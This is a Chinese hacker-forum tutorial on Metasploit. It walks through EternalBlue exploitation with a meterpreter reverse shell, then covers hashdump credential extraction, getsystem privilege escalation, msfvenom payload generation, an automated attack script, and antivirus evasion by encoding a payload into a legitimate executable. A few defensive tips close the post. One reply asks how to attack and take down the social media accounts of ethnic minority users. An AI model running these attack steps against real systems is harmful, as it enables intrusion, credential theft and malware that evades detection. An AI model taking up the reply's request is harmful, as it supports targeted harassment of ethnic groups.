[工具使用] 黑客工具之——Metasploit(MSF)使用详解

831 2
Honkers 2026-2-7 00:07:00 | 显示全部楼层 |阅读模式

一、Metasploit 简介

Metasploit 是一个开源的渗透测试框架,提供漏洞利用、Payload 生成、后渗透工具等功能,广泛应用于安全研究和渗透测试。其核心组件包括:

  • msfconsole:主命令行交互界面。
  • 模块:分为 exploits、payloads、auxiliary、post 等类型。
  • 数据库支持:存储扫描结果和攻击数据。

二、安装与配置

1. 安装 Metasploit

  • Kali Linux:安装过的,可以直接使用

打开kali Linux终端,输入msfconsole就能进入MSF操作页面

  • 其他系统的安装方式
    1. # Debian/Ubuntu
    2. curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
    3. chmod +x msfinstall
    4. ./msfinstall
    5. # macOS (通过 Homebrew)
    6. brew install metasploit
    复制代码

2. 初始化数据库

  1. msfdb init # 初始化数据库
  2. msfconsole # 启动控制台
  3. db_status # 检查数据库连接
复制代码

三、基本命令与模块

1. 常用命令

命令说明
search [keyword]搜索模块(如 search eternalblue)
use [module]选择模块(如 use exploit/windows/smb/ms17_010_eternalblue)
show options查看模块所需参数
set [PARAM] [VALUE]设置参数(如 set RHOSTS 192.168.1.100)
run 或 exploit执行模块
sessions -l列出已建立的会话
sessions -i [ID]进入指定会话

2. 模块类型

模块类型说明示例路径
Exploit漏洞利用模块exploit/windows/smb/ms17_010_eternalblue
Payload攻击成功后执行的代码(如反向 Shell)payload/windows/meterpreter/reverse_tcp
Auxiliary辅助模块(扫描、嗅探等)auxiliary/scanner/smb/smb_version
Post后渗透模块(提权、信息收集等)post/windows/gather/credentials
Encoder编码 Payload 以绕过检测encoder/x86/shikata_ga_nai

四、实战示例:攻击 Windows SMB 漏洞(永恒之蓝)

步骤 1:选择 Exploit 模块

  1. use exploit/windows/smb/ms17_010_eternalblue
复制代码

步骤 2:配置参数

  1. set RHOSTS 192.168.100.130 # 目标 IP
  2. set PAYLOAD windows/x64/meterpreter/reverse_tcp # 选择 Payload
  3. set LHOST 192.168.1.10 # 攻击者 IP(监听地址)
  4. set LPORT 4444 # 监听端口
复制代码

步骤 3:执行攻击

  1. exploit
复制代码

成功后会进入 meterpreter 会话。

五、Meterpreter 后渗透操作

常用命令

命令说明
sysinfo查看目标系统信息
getuid查看当前权限
hashdump提取用户哈希
screenshot截取屏幕截图
upload [本地文件] [远程路径]上传文件到目标
download [远程文件] [本地路径]下载文件到本地
shell进入系统命令行
run post/windows/gather/enum_logged_on_users枚举登录用户

提权操作

  1. # 尝试提权到 SYSTEM
  2. use post/windows/escalate/getsystem
  3. run
复制代码

六、高级技巧

1. 生成独立 Payload

  1. msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.100.130 LPORT=4444 -f exe -o payload.exe
复制代码

参数说明:-p 指定 Payload,-f 指定输出格式,-o 输出文件。

2. 自动化攻击

使用 resource 脚本批量执行命令:

  1. # 创建脚本文件 attack.rc
  2. use exploit/windows/smb/ms17_010_eternalblue
  3. set RHOSTS 192.168.100.130
  4. set PAYLOAD windows/x64/meterpreter/reverse_tcp
  5. set LHOST 192.168.1.10
  6. exploit -z
  7. msfconsole -r attack.rc # 执行脚本
复制代码

3. 绕过杀毒软件(AV Evasion)

使用编码器和自定义模板:

  1. msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.100.130 LPORT=4444 -e x86/shikata_ga_nai -i 5 -x legit_app.exe -f exe -o malicious.exe
复制代码

七、防御措施

  1. 及时更新系统补丁:修复已知漏洞。
  2. 禁用不必要的服务:如 SMBv1。
  3. 部署防火墙/IDS:监控异常流量。
  4. 最小化权限原则:限制用户权限。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

×
198382 2026-2-7 16:26:54 来自手机 | 显示全部楼层
看到讨论Metasploit这类‘矛’的工具,也来聊聊‘盾’的一面。最近刚压住一次针对Spring Cloud网关的应用层DDoS,攻击者不再用流量蛮力冲撞,而是用海量慢速、仿真的HTTP请求‘浸泡’我们的业务接口,差点引发服务雪崩。

事后复盘,传统的‘限流+封IP’组合拳在面对这种 ‘拟态正常业务’ 的攻击时,显得非常被动。规则设严了误伤真实用户,设松了又防不住。这促使我们重新系统性地审视了整个微服务栈的防护体系。

不知各位同仁是否遇到过类似场景?大家首要的加固点和踩过最大的坑分别是什么?”
杂事杂论1995 2026-2-10 03:13:30 | 显示全部楼层
你好 社媒如推特烦人少独能不能攻击干掉号啊 如满蒙朝彝 了解关注一下
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

中国红客联盟公众号

联系站长QQ:5520533

admin@chnhonker.com
Copyright © 2001-2026 Discuz Team. Powered by Discuz! X3.5 ( 粤ICP备13060014号 )|天天打卡 本站已运行